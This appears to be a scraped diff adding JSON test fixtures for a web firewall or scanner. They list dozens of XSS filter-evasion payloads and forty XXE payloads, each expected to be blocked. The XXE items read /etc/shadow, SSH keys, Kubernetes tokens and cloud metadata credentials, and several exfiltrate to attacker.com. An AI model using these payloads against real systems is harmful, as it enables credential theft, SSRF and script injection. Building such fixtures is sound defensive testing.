{"id":"xss-ev-015","payload":"<audio src=x onerror=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["audio","onerror"],"notes":"Audio onerror","expected_block":true},
|
|
17
|
+
{"id":"xss-ev-016","payload":"<body onload=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["body","onload"],"notes":"Body onload event","expected_block":true},
|
|
18
|
+
{"id":"xss-ev-017","payload":"<body onpageshow=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["body","onpageshow"],"notes":"Body pageshow event","expected_block":true},
|
|
19
|
+
{"id":"xss-ev-018","payload":"<body onhashchange=alert(1)><a href=#>click</a>","category":"xss","method":"GET","severity_hint":"critical","tags":["body","onhashchange"],"notes":"Hash change trigger","expected_block":true},
|
|
20
|
+
{"id":"xss-ev-019","payload":"<marquee onstart=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["marquee","onstart"],"notes":"Marquee onstart event","expected_block":true},
|
|
21
|
+
{"id":"xss-ev-020","payload":"<details open ontoggle=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["details","ontoggle"],"notes":"Details ontoggle auto-fire","expected_block":true},
|
|
22
|
+
{"id":"xss-ev-021","payload":"<meter onmouseover=alert(1)>0</meter>","category":"xss","method":"GET","severity_hint":"high","tags":["meter","mouseover"],"notes":"Meter element event","expected_block":true},
|
|
23
|
+
{"id":"xss-ev-022","payload":"<object data=javascript:alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["object","javascript-uri"],"notes":"Object with JS URI","expected_block":true},
|
|
24
|
+
{"id":"xss-ev-023","payload":"<embed src=javascript:alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["embed","javascript-uri"],"notes":"Embed with JS URI","expected_block":true},
|
|
25
|
+
{"id":"xss-ev-024","payload":"<a href=javascript:alert(1)>click</a>","category":"xss","method":"GET","severity_hint":"critical","tags":["anchor","javascript-uri"],"notes":"Classic javascript: URI","expected_block":true},
|
|
26
|
+
{"id":"xss-ev-025","payload":"<a href=jaVasCrIpT:alert(1)>click</a>","category":"xss","method":"GET","severity_hint":"critical","tags":["anchor","case-variation"],"notes":"Mixed case javascript:","expected_block":true},
|
|
27
|
+
{"id":"xss-ev-026","payload":"<a href=java%0ascript:alert(1)>click</a>","category":"xss","method":"GET","severity_hint":"critical","tags":["anchor","newline-inject"],"notes":"Newline in javascript:","expected_block":true},
|
|
28
|
+
{"id":"xss-ev-027","payload":"<a href=java%09script:alert(1)>click</a>","category":"xss","method":"GET","severity_hint":"critical","tags":["anchor","tab-inject"],"notes":"Tab in javascript:","expected_block":true},
|
|
29
|
+
{"id":"xss-ev-028","payload":"<a href=java%0dscript:alert(1)>click</a>","category":"xss","method":"GET","severity_hint":"critical","tags":["anchor","cr-inject"],"notes":"CR in javascript:","expected_block":true},
|
|
30
|
+
{"id":"xss-ev-029","payload":"<a href=\"javascript:alert(1)\">click</a>","category":"xss","method":"GET","severity_hint":"critical","tags":["anchor","html-entity"],"notes":"HTML entity encoded javascript:","expected_block":true},
|
|
31
|
+
{"id":"xss-ev-030","payload":"<a href=\"javascript:alert(1)\">click</a>","category":"xss","method":"GET","severity_hint":"critical","tags":["anchor","hex-entity"],"notes":"Hex entity javascript:","expected_block":true},
|
|
32
|
+
{"id":"xss-ev-031","payload":"<iframe src=javascript:alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["iframe","javascript-uri"],"notes":"Iframe with JS URI","expected_block":true},
|
|
33
|
+
{"id":"xss-ev-032","payload":"<iframe srcdoc='<script>alert(1)</script>'>","category":"xss","method":"GET","severity_hint":"critical","tags":["iframe","srcdoc"],"notes":"Iframe srcdoc injection","expected_block":true},
|
|
34
|
+
{"id":"xss-ev-033","payload":"<math><mtext><table><mglyph><style><!--</style><img title=\"--><img src=x onerror=alert(1)>\">","category":"xss","method":"GET","severity_hint":"critical","tags":["math","mtext","mutation-xss"],"notes":"MathML mutation XSS","expected_block":true},
|
|
35
|
+
{"id":"xss-ev-034","payload":"<svg><animate onbegin=alert(1) attributeName=x dur=1s>","category":"xss","method":"GET","severity_hint":"critical","tags":["svg","animate","onbegin"],"notes":"SVG animate onbegin","expected_block":true},
|
|
36
|
+
{"id":"xss-ev-035","payload":"<svg><set onbegin=alert(1) attributeName=x to=1>","category":"xss","method":"GET","severity_hint":"critical","tags":["svg","set","onbegin"],"notes":"SVG set element onbegin","expected_block":true},
|
|
37
|
+
{"id":"xss-ev-036","payload":"<svg><a><rect width=100% height=100%></rect><animate attributeName=href values=javascript:alert(1) /></a>","category":"xss","method":"GET","severity_hint":"critical","tags":["svg","animate","href"],"notes":"SVG animated href","expected_block":true},
|
|
38
|
+
{"id":"xss-ev-037","payload":"<svg><use href=data:image/svg+xml;base64,PHN2ZyBpZD0ieCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayI+PGVtYmVkIHNyYz0iamF2YXNjcmlwdDphbGVydCgxKSIvPjwvc3ZnPg==#x>","category":"xss","method":"GET","severity_hint":"critical","tags":["svg","use","data-uri","base64"],"notes":"SVG use with base64 data URI","expected_block":true},
|
|
39
|
+
{"id":"xss-ev-038","payload":"<script>eval(atob('YWxlcnQoMSk='))</script>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","base64","eval"],"notes":"Base64 decoded eval","expected_block":true},
|
|
40
|
+
{"id":"xss-ev-039","payload":"<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","charcode","eval"],"notes":"CharCode eval bypass","expected_block":true},
|
|
41
|
+
{"id":"xss-ev-040","payload":"<script>[].constructor.constructor('alert(1)')()</script>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","constructor","evasion"],"notes":"Constructor chain execution","expected_block":true},
|
|
42
|
+
{"id":"xss-ev-041","payload":"<script>window['al'+'ert'](1)</script>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","string-concat","evasion"],"notes":"String concat function name","expected_block":true},
|
|
43
|
+
{"id":"xss-ev-042","payload":"<script>this['alert'](1)</script>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","bracket-notation"],"notes":"Bracket notation access","expected_block":true},
|
|
44
|
+
{"id":"xss-ev-043","payload":"<script>self['alert'](1)</script>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","self-reference"],"notes":"self object reference","expected_block":true},
|
|
45
|
+
{"id":"xss-ev-044","payload":"<script>top['alert'](1)</script>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","top-reference"],"notes":"top object reference","expected_block":true},
|
|
46
|
+
{"id":"xss-ev-045","payload":"<script>parent['alert'](1)</script>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","parent-reference"],"notes":"parent object reference","expected_block":true},
|
|
47
|
+
{"id":"xss-ev-046","payload":"<script>frames['alert'](1)</script>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","frames-reference"],"notes":"frames object reference","expected_block":true},
|
|
48
|
+
{"id":"xss-ev-047","payload":"<script>globalThis['alert'](1)</script>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","globalThis"],"notes":"globalThis access","expected_block":true},
|
|
49
|
+
{"id":"xss-ev-048","payload":"<script>Function('alert(1)')()</script>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","Function-constructor"],"notes":"Function constructor","expected_block":true},
|
|
50
|
+
{"id":"xss-ev-049","payload":"<script>new Function`alert\\u00601`()</script>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","tagged-template"],"notes":"Tagged template with Function","expected_block":true},
|
|
51
|
+
{"id":"xss-ev-050","payload":"<script>setTimeout('alert(1)',0)</script>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","setTimeout"],"notes":"setTimeout string eval","expected_block":true},
|
|
52
|
+
{"id":"xss-ev-051","payload":"<script>setInterval('alert(1)',1000)</script>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","setInterval"],"notes":"setInterval string eval","expected_block":true},
|
|
53
|
+
{"id":"xss-ev-052","payload":"<svg onload=alert(/xss/)>","category":"xss","method":"GET","severity_hint":"critical","tags":["svg","regex-literal"],"notes":"RegExp literal alert arg","expected_block":true},
|
|
54
|
+
{"id":"xss-ev-053","payload":"<svg onload=alert(document.domain)>","category":"xss","method":"GET","severity_hint":"critical","tags":["svg","document.domain"],"notes":"Domain exfiltration","expected_block":true},
|
|
55
|
+
{"id":"xss-ev-054","payload":"<svg onload=alert(document.cookie)>","category":"xss","method":"GET","severity_hint":"critical","tags":["svg","cookie-theft"],"notes":"Cookie exfiltration","expected_block":true},
|
|
56
|
+
{"id":"xss-ev-055","payload":"<img src=x onerror=\"javascript:alert(1)\">","category":"xss","method":"GET","severity_hint":"critical","tags":["img","javascript-prefix"],"notes":"javascript: prefix in event","expected_block":true},
|
|
57
|
+
{"id":"xss-ev-056","payload":"<img src=x onerror=eval('\\x61\\x6c\\x65\\x72\\x74\\x28\\x31\\x29')>","category":"xss","method":"GET","severity_hint":"critical","tags":["img","hex-escape","eval"],"notes":"Hex escaped eval payload","expected_block":true},
|
|
58
|
+
{"id":"xss-ev-057","payload":"<img src=x onerror=eval('\\141\\154\\145\\162\\164\\050\\061\\051')>","category":"xss","method":"GET","severity_hint":"critical","tags":["img","octal-escape","eval"],"notes":"Octal escaped eval payload","expected_block":true},
|
|
59
|
+
{"id":"xss-ev-058","payload":"<img src=x onerror=eval('\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029')>","category":"xss","method":"GET","severity_hint":"critical","tags":["img","unicode-escape","eval"],"notes":"Unicode escaped eval payload","expected_block":true},
|
|
60
|
+
{"id":"xss-ev-059","payload":"<!--><svg/onload=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["comment-bypass","svg"],"notes":"HTML comment bypass","expected_block":true},
|
|
61
|
+
{"id":"xss-ev-060","payload":"\"><svg/onload=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["attribute-break","svg"],"notes":"Double quote attribute break","expected_block":true},
|
|
62
|
+
{"id":"xss-ev-061","payload":"'><svg/onload=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["attribute-break","svg"],"notes":"Single quote attribute break","expected_block":true},
|
|
63
|
+
{"id":"xss-ev-062","payload":"><svg/onload=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["tag-break","svg"],"notes":"Tag break with SVG","expected_block":true},
|
|
64
|
+
{"id":"xss-ev-063","payload":"</script><svg/onload=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["script-break","svg"],"notes":"Script tag break","expected_block":true},
|
|
65
|
+
{"id":"xss-ev-064","payload":"</title><svg/onload=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["title-break","svg"],"notes":"Title tag break","expected_block":true},
|
|
66
|
+
{"id":"xss-ev-065","payload":"</textarea><svg/onload=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["textarea-break","svg"],"notes":"Textarea tag break","expected_block":true},
|
|
67
|
+
{"id":"xss-ev-066","payload":"</style><svg/onload=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["style-break","svg"],"notes":"Style tag break","expected_block":true},
|
|
68
|
+
{"id":"xss-ev-067","payload":"</noscript><svg/onload=alert(1)>","category":"xss","method":"GET","severity_hint":"critical","tags":["noscript-break","svg"],"notes":"Noscript tag break","expected_block":true},
|
|
69
|
+
{"id":"xss-ev-068","payload":"<ScRiPt>alert(1)</ScRiPt>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","case-variation"],"notes":"Mixed case script tag","expected_block":true},
|
|
70
|
+
{"id":"xss-ev-069","payload":"<scr<script>ipt>alert(1)</scr</script>ipt>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","double-encoding"],"notes":"Nested script tag fragments","expected_block":true},
|
|
71
|
+
{"id":"xss-ev-070","payload":"<script x>alert(1)</script y>","category":"xss","method":"GET","severity_hint":"critical","tags":["script","attribute-junk"],"notes":"Junk attributes in script","expected_block":true},
|
|
72
|
+
{"id":"xss-ev-071","payload":"<img src=x:alert(alt) onerror=eval(src) alt=1>","category":"xss","method":"GET","severity_hint":"critical","tags":["img","attribute-chain"],"notes":"Cross-attribute payload","expected_block":true},
|
|
73
|
+
{"id":"xss-ev-072","payload":"<img src=1 onerror=alert(1)//","category":"xss","method":"GET","severity_hint":"critical","tags":["img","unclosed-tag"],"notes":"Unclosed img tag","expected_block":true},
|
|
74
|
+
{"id":"xss-ev-073","payload":"<svg><script>alert(1)</script>","category":"xss","method":"GET","severity_hint":"critical","tags":["svg","script","html-entity"],"notes":"HTML entities in SVG script","expected_block":true},
|
|
75
|
+
{"id":"xss-ev-074","payload":"<math><mi><img src=x onerror=alert(1)></mi></math>","category":"xss","method":"GET","severity_hint":"critical","tags":["math","img","mathml"],"notes":"MathML context switch","expected_block":true},
|
|
76
|
+
{"id":"xss-ev-075","payload":"<xmp><img src=x onerror=alert(1)//></xmp>","category":"xss","method":"GET","severity_hint":"critical","tags":["xmp","legacy"],"notes":"Legacy XMP element","expected_block":true},
|
|
77
|
+
{"id":"xss-ev-076","payload":"<form><button formaction=javascript:alert(1)>X</button></form>","category":"xss","method":"GET","severity_hint":"critical","tags":["form","formaction"],"notes":"formaction javascript: URI","expected_block":true},
|
|
78
|
+
{"id":"xss-ev-077","payload":"<isindex action=javascript:alert(1) type=image>","category":"xss","method":"GET","severity_hint":"critical","tags":["isindex","legacy"],"notes":"Legacy isindex element","expected_block":true},
|
|
79
|
+
{"id":"xss-ev-078","payload":"<base href=javascript:alert(1)//","category":"xss","method":"GET","severity_hint":"critical","tags":["base","javascript-uri"],"notes":"Base href injection","expected_block":true},
|
|
80
|
+
{"id":"xss-ev-079","payload":"<x onclick=alert(1)>click","category":"xss","method":"GET","severity_hint":"high","tags":["custom-element","onclick"],"notes":"Custom element with event","expected_block":true},
|
|
81
|
+
{"id":"xss-ev-080","payload":"<style>@import 'data:text/css,*{background:url(javascript:alert(1))}';</style>","category":"xss","method":"GET","severity_hint":"critical","tags":["style","import","css"],"notes":"CSS import injection (legacy)","expected_block":true}
|
|
82
|
+
]
|
|
@@ -0,0 +1,42 @@
|
|
|
1
|
+
[
|
|
2
|
+
{"id":"xxe-adv-001","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["classic","file-read","linux"],"notes":"Classic XXE file read","expected_block":true},
|
|
3
|
+
{"id":"xxe-adv-002","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///c:/windows/win.ini\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["classic","file-read","windows"],"notes":"Windows XXE file read","expected_block":true},
|
|
4
|
+
{"id":"xxe-adv-003","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://attacker.com/xxe\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["ssrf","http"],"notes":"XXE to SSRF","expected_block":true},
|
|
5
|
+
{"id":"xxe-adv-004","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://attacker.com/evil.dtd\"> %xxe;]><foo>test</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["oob","parameter-entity"],"notes":"OOB XXE via external DTD","expected_block":true},
|
|
6
|
+
{"id":"xxe-adv-005","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY % file SYSTEM \"file:///etc/passwd\"><!ENTITY % dtd SYSTEM \"http://attacker.com/evil.dtd\"> %dtd;]><foo>test</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["oob","data-exfil"],"notes":"OOB XXE data exfiltration","expected_block":true},
|
|
7
|
+
{"id":"xxe-adv-006","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"expect://id\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["rce","expect","php"],"notes":"XXE to RCE via expect://","expected_block":true},
|
|
8
|
+
{"id":"xxe-adv-007","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=index.php\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["php","filter","source-read"],"notes":"XXE PHP filter source read","expected_block":true},
|
|
9
|
+
{"id":"xxe-adv-008","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///dev/random\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"high","tags":["dos","linux"],"notes":"XXE DoS via /dev/random","expected_block":true},
|
|
10
|
+
{"id":"xxe-adv-009","payload":"<?xml version=\"1.0\"?><!DOCTYPE lolz [<!ENTITY lol \"lol\"><!ENTITY lol2 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\"><!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\"><!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">]><lolz>&lol4;</lolz>","category":"xxe","method":"POST","severity_hint":"high","tags":["dos","billion-laughs"],"notes":"Billion laughs DoS (reduced)","expected_block":true},
|
|
11
|
+
{"id":"xxe-adv-010","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:///etc/shadow\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["file-read","credentials","linux"],"notes":"Shadow file read","expected_block":true},
|
|
12
|
+
{"id":"xxe-adv-011","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///proc/self/environ\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["linux","proc","info-disclosure"],"notes":"Process environment read","expected_block":true},
|
|
13
|
+
{"id":"xxe-adv-012","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///root/.ssh/id_rsa\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["ssh","credentials"],"notes":"SSH key exfiltration","expected_block":true},
|
|
14
|
+
{"id":"xxe-adv-013","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///var/run/secrets/kubernetes.io/serviceaccount/token\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["kubernetes","token","cloud"],"notes":"K8s service account token via XXE","expected_block":true},
|
|
15
|
+
{"id":"xxe-adv-014","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://169.254.169.254/latest/meta-data/iam/security-credentials/\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["aws","cloud","ssrf"],"notes":"AWS IMDS via XXE","expected_block":true},
|
|
16
|
+
{"id":"xxe-adv-015","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["gcp","cloud","ssrf"],"notes":"GCP metadata via XXE","expected_block":true},
|
|
17
|
+
{"id":"xxe-adv-016","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"jar:http://attacker.com/evil.jar!/test.txt\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["java","jar","ssrf"],"notes":"Java JAR protocol XXE","expected_block":true},
|
|
18
|
+
{"id":"xxe-adv-017","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"netdoc:///etc/passwd\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["java","netdoc","file-read"],"notes":"Java netdoc protocol","expected_block":true},
|
|
19
|
+
{"id":"xxe-adv-018","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"gopher://attacker.com:25/xHELO%20attacker.com\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["gopher","ssrf"],"notes":"Gopher protocol via XXE","expected_block":true},
|
|
20
|
+
{"id":"xxe-adv-019","payload":"<?xml version=\"1.0\" encoding=\"UTF-16\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["encoding","utf16","evasion"],"notes":"UTF-16 encoded XXE","expected_block":true},
|
|
21
|
+
{"id":"xxe-adv-020","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo SYSTEM \"http://attacker.com/evil.dtd\"><foo>test</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["external-dtd","system"],"notes":"External DTD reference","expected_block":true},
|
|
22
|
+
{"id":"xxe-adv-021","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo PUBLIC \"-//OASIS//DTD DocBook V4.1//EN\" \"http://attacker.com/evil.dtd\"><foo>test</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["external-dtd","public"],"notes":"PUBLIC DTD reference","expected_block":true},
|
|
23
|
+
{"id":"xxe-adv-022","payload":"<?xml version=\"1.0\"?><foo xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include parse=\"text\" href=\"file:///etc/passwd\"/></foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["xinclude","file-read"],"notes":"XInclude file inclusion","expected_block":true},
|
|
24
|
+
{"id":"xxe-adv-023","payload":"<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" width=\"300\" viewBox=\"0 0 200 200\"><image xlink:href=\"file:///etc/hostname\"/></svg>","category":"xxe","method":"POST","severity_hint":"critical","tags":["svg","xlink","file-read"],"notes":"SVG XXE via xlink","expected_block":true},
|
|
25
|
+
{"id":"xxe-adv-024","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY % a \"<!ENTITY % b SYSTEM 'http://attacker.com/?data=%a;'>\">%a;%b;]><foo>test</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["parameter-entity","nested"],"notes":"Nested parameter entity XXE","expected_block":true},
|
|
26
|
+
{"id":"xxe-adv-025","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/hostname\">]><methodCall><methodName>&xxe;</methodName></methodCall>","category":"xxe","method":"POST","severity_hint":"critical","tags":["xmlrpc","file-read"],"notes":"XML-RPC XXE","expected_block":true},
|
|
27
|
+
{"id":"xxe-adv-026","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><test>&xxe;</test></soap:Body></soap:Envelope>","category":"xxe","method":"POST","severity_hint":"critical","tags":["soap","file-read"],"notes":"SOAP XML XXE","expected_block":true},
|
|
28
|
+
{"id":"xxe-adv-027","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><saml:Assertion xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\"><saml:Issuer>&xxe;</saml:Issuer></saml:Assertion>","category":"xxe","method":"POST","severity_hint":"critical","tags":["saml","file-read"],"notes":"SAML XXE injection","expected_block":true},
|
|
29
|
+
{"id":"xxe-adv-028","payload":"Content-Type: text/xml\n\n<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["content-type","xml"],"notes":"Forced XML content type","expected_block":true},
|
|
30
|
+
{"id":"xxe-adv-029","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><?xml-stylesheet type=\"text/xsl\" href=\"http://attacker.com/evil.xsl\"?><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["xsl","file-read"],"notes":"XSLT processing with XXE","expected_block":true},
|
|
31
|
+
{"id":"xxe-adv-030","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"\\\\attacker.com\\share\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["smb","ntlm","windows"],"notes":"XXE to SMB for NTLM relay","expected_block":true},
|
|
32
|
+
{"id":"xxe-adv-031","payload":"<?xml version=\"1.0\" encoding=\"utf-7\"?>+ADw-!DOCTYPE foo+AFs-+ADw-!ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI-+AD4-+AF0-+AD4-+ADw-foo+AD4-+ACY-xxe+ADsAPA-/foo+AD4-","category":"xxe","method":"POST","severity_hint":"critical","tags":["encoding","utf7","evasion"],"notes":"UTF-7 encoded XXE","expected_block":true},
|
|
33
|
+
{"id":"xxe-adv-032","payload":"<?xml version=\"1.0\"?><!DOCTYPE data [<!ENTITY % dtd SYSTEM \"data://text/plain;base64,PCFFTlRJVFkgJSBmaWxlIFNZU1RFTSAiZmlsZTovLy9ldGMvcGFzc3dkIj4=\"> %dtd;]><data>&file;</data>","category":"xxe","method":"POST","severity_hint":"critical","tags":["data-uri","base64","evasion"],"notes":"XXE via data: URI DTD","expected_block":true},
|
|
34
|
+
{"id":"xxe-adv-033","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1:22\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"high","tags":["port-scan","ssrf"],"notes":"Internal port scan via XXE","expected_block":true},
|
|
35
|
+
{"id":"xxe-adv-034","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1:6379\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["redis","ssrf"],"notes":"Redis probe via XXE","expected_block":true},
|
|
36
|
+
{"id":"xxe-adv-035","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1:9200/_cat/indices\">]><foo>&xxe;</foo>","category":"xxe","method":"POST","severity_hint":"critical","tags":["elasticsearch","ssrf"],"notes":"Elasticsearch probe via XXE","expected_block":true},
|
|
37
|
+
{"id":"xxe-adv-036","payload":"<?xml version=\"1.0\"?><!DOCTYPE test [<!ENTITY % init SYSTEM \"data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk\"> %init;]><test/>","category":"xxe","method":"POST","severity_hint":"critical","tags":["data-uri","parameter-entity"],"notes":"Parameter entity with data URI","expected_block":true},
|
|
38
|
+
{"id":"xxe-adv-037","payload":"<?xml version=\"1.0\"?><root><name>test</name><tel>test</tel><email>test@test.com</email><password><!ENTITY xxe SYSTEM \"file:///etc/passwd\">&xxe;</password></root>","category":"xxe","method":"POST","severity_hint":"critical","tags":["inline","form-data"],"notes":"XXE in JSON-like XML form","expected_block":true},
|
|
39
|
+
{"id":"xxe-adv-038","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><html xmlns=\"http://www.w3.org/1999/xhtml\"><body>&xxe;</body></html>","category":"xxe","method":"POST","severity_hint":"critical","tags":["xhtml","file-read"],"notes":"XHTML XXE injection","expected_block":true},
|
|
40
|
+
{"id":"xxe-adv-039","payload":"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><feed xmlns=\"http://www.w3.org/2005/Atom\"><title>&xxe;</title></feed>","category":"xxe","method":"POST","severity_hint":"critical","tags":["atom","rss","file-read"],"notes":"Atom/RSS feed XXE","expected_block":true},
|
|
41
|
+
{"id":"xxe-adv-040","payload":"<?xml version=\"1.0\"?><!DOCTYPE Office [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><OfficeConfig><services><service name=\"&xxe;\"/></services></OfficeConfig>","category":"xxe","method":"POST","severity_hint":"critical","tags":["office","docx","file-read"],"notes":"Office XML document XXE","expected_block":true}
|
|
42
|
+
]
|